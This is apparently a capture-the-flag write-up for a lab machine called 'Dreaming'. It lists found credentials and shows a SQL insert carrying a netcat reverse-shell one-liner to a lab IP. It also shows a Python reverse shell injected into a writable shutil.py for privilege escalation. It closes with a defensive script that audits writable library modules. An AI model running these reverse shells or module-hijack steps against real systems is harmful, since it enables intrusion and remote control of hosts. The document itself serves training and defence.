Dreaming

April 08, 2024

We can see here that port 3306 is open, which is the MySQL database service.

Then, after viewing "test.py", we can grab some credentials.

login.php
lucien
HeyLucien#@1999!
mysql
DB_USER = "death"
DB_PASS = "#redacted"
DB_NAME = "library"
ssh lucien@IP
HeyLucien#@1999!
mysql -u lucien -p
lucien42DBPASSWORD

But remember that the code in "getDreams.py" has a vulnerability: it doesn't filter out malicious input.

Now we will look again at the contents of the "dreams" table in the "library" database.

Thus we conclude that we can insert a reverse shell into the database.

INSERT INTO dreams (dreamer, dream) VALUES ('<anything>', '<Reverse_shell>');

INSERT INTO dreams (dreamer, dream) VALUES ('tryingtobehacker', 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f');

When we run the command below as user death, it executes the reverse shell and we receive the connection from it.

sudo -u death /usr/bin/python3 /home/death/getDreams.py

As we navigate to the morpheus user, we can see "restore.py", which is a Python script.

Looking at shutil.py in the directory /usr/lib/python3.8, we can see that we are able to modify it.

cd /usr/lib/python3.8

This is the unedited shutil.py script

Now we will inject our reverse shell into shutil.py.

P.S. Just press Enter multiple times so that we have room to insert our malicious code.

import socket,subprocess,os;
import pty;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.9.193.229",5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
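
A defender's check for the condition abused in this last step, added here as an example (it is not part of the original writeup or of the room's files): it walks a Python library directory and reports every directory or .py module that an untrusted owner, a group, or any user can write to. The function name audit_module_tree and its trusted_uids parameter are illustrative assumptions.

```python
import os
import stat
import sysconfig


def audit_module_tree(root, trusted_uids=frozenset({0})):
    """Return sorted (path, reasons) for directories and .py files under
    root that someone other than a trusted owner could modify."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        # A writable directory is as bad as a writable module: files in it
        # can be replaced, so the directory itself is checked too.
        candidates = [dirpath] + [
            os.path.join(dirpath, name)
            for name in filenames
            if name.endswith(".py")
        ]
        for path in candidates:
            try:
                st = os.stat(path)  # follows symlinks to the real target
            except OSError:
                continue  # broken link or unreadable entry
            reasons = []
            if st.st_mode & stat.S_IWGRP:
                reasons.append(f"group-writable (gid {st.st_gid})")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_uid not in trusted_uids:
                reasons.append(f"owner uid {st.st_uid} is not trusted")
            if reasons:
                findings.append((path, reasons))
    return sorted(findings)


if __name__ == "__main__":
    # Audit the standard library of the interpreter running this script,
    # e.g. /usr/lib/python3.8 on the host described above.
    stdlib = sysconfig.get_paths()["stdlib"]
    for path, reasons in audit_module_tree(stdlib):
        print(f"{path}: {', '.join(reasons)}")
```

Any hit on a module imported by a script that runs as another user (through sudo, cron, or a service) means that user's privileges are reachable by whoever can write the file; restoring root ownership and mode 644 on the module closes it.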
